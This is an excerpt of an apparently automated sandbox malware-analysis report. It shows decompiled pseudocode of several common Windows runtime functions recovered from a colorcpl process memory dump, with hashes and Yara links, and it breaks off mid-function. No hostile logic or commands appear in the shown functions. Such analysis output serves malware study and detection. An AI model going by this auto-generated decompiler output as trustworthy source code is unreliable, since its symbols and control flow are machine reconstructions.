                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EA4257 Relevance: .1, Instructions: 60COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 90%
                                                                                                			E06EA4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x6ef08d0);
				E06E6D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E06EA41E8(__ebx, __edi, __ecx, _t39);
				E06E2EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x6f087e4;
					_t18 =  *0x6f087e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x6f05cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x6f087e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x6f087e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L06E17055(_t31 + 0xfffffff8);
								_t24 =  *0x6f087e0; // 0x0
								_t18 = _t24 - 1;
								 *0x6f087e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x6f05cd0;
				if( *0x6f05cd0 <= 0) {
					L06E17055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x6f087e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x6f087e8 = _t30;
						 *0x6f087e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E06E6D0D1(L06EA4320());
			}















                                                                                                0x06ea4257
                                                                                                0x06ea4257
                                                                                                0x06ea4257
                                                                                                0x06ea4259
                                                                                                0x06ea425e
                                                                                                0x06ea4263
                                                                                                0x06ea4265
                                                                                                0x06ea4273
                                                                                                0x06ea4278
                                                                                                0x06ea427c
                                                                                                0x06ea427f
                                                                                                0x06ea4281
                                                                                                0x06ea4287
                                                                                                0x06ea42d7
                                                                                                0x06ea42d7
                                                                                                0x06ea42da
                                                                                                0x06ea428d
                                                                                                0x06ea428d
                                                                                                0x06ea428f
                                                                                                0x06ea4292
                                                                                                0x06ea4297
                                                                                                0x06ea429c
                                                                                                0x06ea42a0
                                                                                                0x06ea42a6
                                                                                                0x06ea42a8
                                                                                                0x06ea42ae
                                                                                                0x06ea42b3
                                                                                                0x00000000
                                                                                                0x06ea42ba
                                                                                                0x06ea42ba
                                                                                                0x06ea42bf
                                                                                                0x06ea42c5
                                                                                                0x06ea42ca
                                                                                                0x06ea42cf
                                                                                                0x06ea42d0
                                                                                                0x00000000
                                                                                                0x06ea42d0
                                                                                                0x06ea42b3
                                                                                                0x00000000
                                                                                                0x06ea42a6
                                                                                                0x06ea429c
                                                                                                0x06ea42dc
                                                                                                0x06ea42dc
                                                                                                0x06ea42e3
                                                                                                0x06ea4309
                                                                                                0x06ea42e5
                                                                                                0x06ea42e5
                                                                                                0x06ea42e8
                                                                                                0x06ea42ee
                                                                                                0x06ea42f0
                                                                                                0x00000000
                                                                                                0x06ea42f2
                                                                                                0x06ea42f2
                                                                                                0x06ea42f4
                                                                                                0x06ea42f7
                                                                                                0x06ea42f9
                                                                                                0x06ea4300
                                                                                                0x06ea4300
                                                                                                0x06ea42f0
                                                                                                0x06ea430e
                                                                                                0x06ea431f

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cc87fa39b93035b28695453eb68324fc2ac0892019158aad464743d373a696d6
                                                                                                • Instruction ID: 96fa92fde2f357dca1de732953d8c8d84d4c913dd7c2a29582ce74ef559cf738
                                                                                                • Opcode Fuzzy Hash: cc87fa39b93035b28695453eb68324fc2ac0892019158aad464743d373a696d6
                                                                                                • Instruction Fuzzy Hash: FA218B70A10704CFDBD5EF24D40061477E2FF89398B20A26AC225CF294E7B5A445CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E946A7 Relevance: .1, Instructions: 59COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 93%
                                                                                                			E06E946A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L06E34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E06E5F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E06E4D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L06E377F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                                                                0x06e946b7
                                                                                                0x06e946ba
                                                                                                0x06e946c5
                                                                                                0x06e946c8
                                                                                                0x06e946d0
                                                                                                0x06e946d4
                                                                                                0x06e946e6
                                                                                                0x06e946e9
                                                                                                0x06e946f4
                                                                                                0x06e946ff
                                                                                                0x06e94705
                                                                                                0x06e94706
                                                                                                0x06e9470c
                                                                                                0x06e94713
                                                                                                0x06e9471b
                                                                                                0x06e94723
                                                                                                0x06e94725
                                                                                                0x06e946d6
                                                                                                0x06e946d9
                                                                                                0x06e946db
                                                                                                0x06e946db
                                                                                                0x06e94732

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                • Instruction ID: 8a6b0ee669ff422bb23f55a898ba51ddcb4089901a9d9a077858cd4295b3b13c
                                                                                                • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                • Instruction Fuzzy Hash: 4411C272904208BBCB059F6C98808BEB7BDEF95304F1090AAF944C7391DA318D55D7A5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E42397 Relevance: .1, Instructions: 59COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 34%
                                                                                                			E06E42397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x6f0848c != 0) {
					L06E3FAD0(0x6f08610);
					if( *0x6f0848c == 0) {
						E06E3FA00(0x6f08610, _t19, _t27, 0x6f08610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E06E42581(0x6f08610, 0x6df50a0, _t26, _t27, _t28);
						E06E3FA00(0x6f08610, 0x6df50a0, _t27, 0x6f08610);
					}
				} else {
					L1:
					_t11 =  *0x6f08614; // 0x1
					if(_t11 == 0) {
						_t11 = E06E54886(0x6df1088, 1, 0x6f08614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E06E42581(0x6f08610, (_t11 << 4) + 0x6df5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                                                                0x06e423b0
                                                                                                0x06e423b6
                                                                                                0x06e42409
                                                                                                0x06e42415
                                                                                                0x06e85ae9
                                                                                                0x00000000
                                                                                                0x06e4241b
                                                                                                0x06e4241b
                                                                                                0x06e4241d
                                                                                                0x06e42427
                                                                                                0x06e4242e
                                                                                                0x06e42430
                                                                                                0x06e42430
                                                                                                0x06e423b8
                                                                                                0x06e423b8
                                                                                                0x06e423b8
                                                                                                0x06e423bf
                                                                                                0x06e423fc
                                                                                                0x06e423fc
                                                                                                0x06e423c1
                                                                                                0x06e423c3
                                                                                                0x06e423d0
                                                                                                0x06e423d8
                                                                                                0x06e423d8
                                                                                                0x06e423dc
                                                                                                0x06e423de
                                                                                                0x06e423e1
                                                                                                0x06e423e1
                                                                                                0x06e423ec

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 016093cd23c21461c2090eb00787098eae67d28e7ff481ec472620e687b83c19
                                                                                                • Instruction ID: 2ebc89e2dd1d9205de8b934fccd37a5a2e020cfdd1aa27aabc577d13694e0fb3
                                                                                                • Opcode Fuzzy Hash: 016093cd23c21461c2090eb00787098eae67d28e7ff481ec472620e687b83c19
                                                                                                • Instruction Fuzzy Hash: D6116B31A00301AFEBE0B63ABC84B15B6DDFB50750F195026F71297290C9B0DD40C799
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E537F5 Relevance: .1, Instructions: 57COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 87%
                                                                                                			E06E537F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E06E32280(_t6, 0x6f08550);
				}
				_t29 = E06E5387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E06E2FFB0(0x6f08550, _t27, 0x6f08550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                                                                0x06e537fa
                                                                                                0x06e537fc
                                                                                                0x06e53805
                                                                                                0x06e53808
                                                                                                0x06e53808
                                                                                                0x06e53814
                                                                                                0x06e53818
                                                                                                0x06e53846
                                                                                                0x06e53848
                                                                                                0x06e5384b
                                                                                                0x06e5384b
                                                                                                0x06e53852
                                                                                                0x00000000
                                                                                                0x06e53854
                                                                                                0x06e53856
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e53863
                                                                                                0x00000000
                                                                                                0x06e53863
                                                                                                0x06e5381a
                                                                                                0x06e5381a
                                                                                                0x06e5381f
                                                                                                0x06e5386e
                                                                                                0x06e5386e
                                                                                                0x06e53871
                                                                                                0x06e53873
                                                                                                0x06e53873
                                                                                                0x06e53868
                                                                                                0x00000000
                                                                                                0x06e53868
                                                                                                0x06e53821
                                                                                                0x06e53826
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e53828
                                                                                                0x06e5382a
                                                                                                0x06e53841
                                                                                                0x00000000
                                                                                                0x06e53841

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 795ef07f9573347ce394930d1697fb45b7ce6e343c288fe51376bbbc85ad4cc4
                                                                                                • Instruction ID: 22fadadcf8d5a1a3193c83f4cab25d613bc3744a09af42f2d429bf36e5e4af2a
                                                                                                • Opcode Fuzzy Hash: 795ef07f9573347ce394930d1697fb45b7ce6e343c288fe51376bbbc85ad4cc4
                                                                                                • Instruction Fuzzy Hash: E101D6B2D017209BC3BB8B59D940E26BBAADF85BE47275069ED55CB290E730D801C7C1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E1C962 Relevance: .1, Instructions: 57COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 42%
                                                                                                			E06E1C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x6f0d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E06E2EEF0(0x6f070a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E06E9F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E06E2EB70(_t29, 0x6f070a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E06E5B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E06E9F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x6f070c0; // 0x0
					while(_t38 != 0x6f070c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x6f0b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                                                                0x06e1c96a
                                                                                                0x06e1c974
                                                                                                0x06e1c988
                                                                                                0x06e1c98a
                                                                                                0x06e87c9d
                                                                                                0x06e87c9f
                                                                                                0x06e87ca4
                                                                                                0x06e87cae
                                                                                                0x06e87cf0
                                                                                                0x06e87cf5
                                                                                                0x06e87cfa
                                                                                                0x06e1c992
                                                                                                0x06e1c996
                                                                                                0x06e1c997
                                                                                                0x06e1c998
                                                                                                0x06e1c9a3
                                                                                                0x06e1c9a3
                                                                                                0x06e87cb0
                                                                                                0x06e87cb7
                                                                                                0x06e87cbb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e87cbd
                                                                                                0x06e87ce8
                                                                                                0x06e87cc5
                                                                                                0x06e87cc8
                                                                                                0x06e87cca
                                                                                                0x06e87cd0
                                                                                                0x06e87cd6
                                                                                                0x06e87cde
                                                                                                0x06e87ce4
                                                                                                0x06e87ce4
                                                                                                0x06e87cd0
                                                                                                0x00000000
                                                                                                0x06e87ce8
                                                                                                0x06e1c990
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 50f96fc29ecd744d146d5736113c9fc7a7fe943c771440c91fa4c9feb5067a7b
                                                                                                • Instruction ID: f67506695e56e1331bb69a9a75a860f3b111b8150b9e9b60e2be380d3f61c1de
                                                                                                • Opcode Fuzzy Hash: 50f96fc29ecd744d146d5736113c9fc7a7fe943c771440c91fa4c9feb5067a7b
                                                                                                • Instruction Fuzzy Hash: 2D1125327107069FDBD0BF29CC81A6BB7E6FF88614B102228E9598B651DB61EC04C7D1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E4002D Relevance: .1, Instructions: 55COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06E4002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E06E37D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E06E37D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E06E37D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E06E37D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                                                                0x06e40032
                                                                                                0x06e40037
                                                                                                0x06e40043
                                                                                                0x06e84b3a
                                                                                                0x06e40049
                                                                                                0x06e40049
                                                                                                0x06e40049
                                                                                                0x06e4004e
                                                                                                0x06e40053
                                                                                                0x06e84b48
                                                                                                0x06e84b5a
                                                                                                0x06e84b4a
                                                                                                0x06e84b53
                                                                                                0x06e84b53
                                                                                                0x06e84b5f
                                                                                                0x00000000
                                                                                                0x06e84b61
                                                                                                0x00000000
                                                                                                0x06e84b61
                                                                                                0x06e40059
                                                                                                0x06e40059
                                                                                                0x06e40060
                                                                                                0x06e84b6f
                                                                                                0x06e84b6f
                                                                                                0x06e40069
                                                                                                0x06e84b83
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e84b90
                                                                                                0x06e84b9b
                                                                                                0x06e84b9b
                                                                                                0x06e84ba4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e84baa
                                                                                                0x00000000
                                                                                                0x06e4006f
                                                                                                0x06e4006f
                                                                                                0x00000000
                                                                                                0x06e4006f
                                                                                                0x06e40069

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                • Instruction ID: 6d0be64d10048d3cccfa0c85e83da3446a879bec0514eb61043d59801e8f43fa
                                                                                                • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                • Instruction Fuzzy Hash: 7611E571A11782CFE7E2AB74D948B7937E8EB41758F0924B0DE1C876D2E328C841C654
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E2766D Relevance: .1, Instructions: 54COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 94%
                                                                                                			E06E2766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E06E4F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E06E4F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L06E34620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                                                                0x06e27672
                                                                                                0x06e2767f
                                                                                                0x06e27689
                                                                                                0x06e276de
                                                                                                0x06e276de
                                                                                                0x06e2768b
                                                                                                0x06e27691
                                                                                                0x06e27693
                                                                                                0x06e27697
                                                                                                0x00000000
                                                                                                0x06e27699
                                                                                                0x06e276a8
                                                                                                0x00000000
                                                                                                0x06e276aa
                                                                                                0x06e276ad
                                                                                                0x06e276b1
                                                                                                0x00000000
                                                                                                0x06e276b3
                                                                                                0x06e276b3
                                                                                                0x06e276b5
                                                                                                0x06e276ba
                                                                                                0x06e276bc
                                                                                                0x06e276bc
                                                                                                0x06e276c0
                                                                                                0x00000000
                                                                                                0x06e276c2
                                                                                                0x06e276ce
                                                                                                0x06e276ce
                                                                                                0x06e276c0
                                                                                                0x06e276b1
                                                                                                0x06e276a8
                                                                                                0x06e27697
                                                                                                0x06e276d9

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                • Instruction ID: 01db918273919f0dfd58ec849f9b3f3390f70b30738983b62ef3eedb37e0eba6
                                                                                                • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                • Instruction Fuzzy Hash: 0B01A032710329AFCB50DE5DDC85E5777AEEB84760F141564B915DB250DA30DD01C7A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EAC450 Relevance: .1, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 46%
                                                                                                			E06EAC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E06E59910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E06E595B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E06E595D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E06E595D0();
				return L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                                                                0x06eac458
                                                                                                0x06eac45d
                                                                                                0x06eac466
                                                                                                0x06eac468
                                                                                                0x06eac469
                                                                                                0x06eac46a
                                                                                                0x06eac46b
                                                                                                0x06eac46e
                                                                                                0x06eac46f
                                                                                                0x06eac471
                                                                                                0x06eac476
                                                                                                0x06eac476
                                                                                                0x06eac47c
                                                                                                0x06eac47e
                                                                                                0x06eac480
                                                                                                0x06eac480
                                                                                                0x06eac483
                                                                                                0x06eac484
                                                                                                0x06eac486
                                                                                                0x06eac488
                                                                                                0x06eac48f
                                                                                                0x06eac491
                                                                                                0x06eac493
                                                                                                0x06eac493
                                                                                                0x06eac48f
                                                                                                0x06eac498
                                                                                                0x06eac49e
                                                                                                0x06eac4ad
                                                                                                0x06eac4ad
                                                                                                0x06eac4b2
                                                                                                0x06eac4b4
                                                                                                0x06eac4cd

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                • Instruction ID: 52596457b32902f731658c06ce49da2f4867de2c613ef1e39e86ab8eaa945811
                                                                                                • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                • Instruction Fuzzy Hash: 9E01DE72140709FFDBA1AF25CC80EA2F76DFF44795F114125F224475A0CB22ACA1CAA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E19080 Relevance: .1, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 69%
                                                                                                			E06E19080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
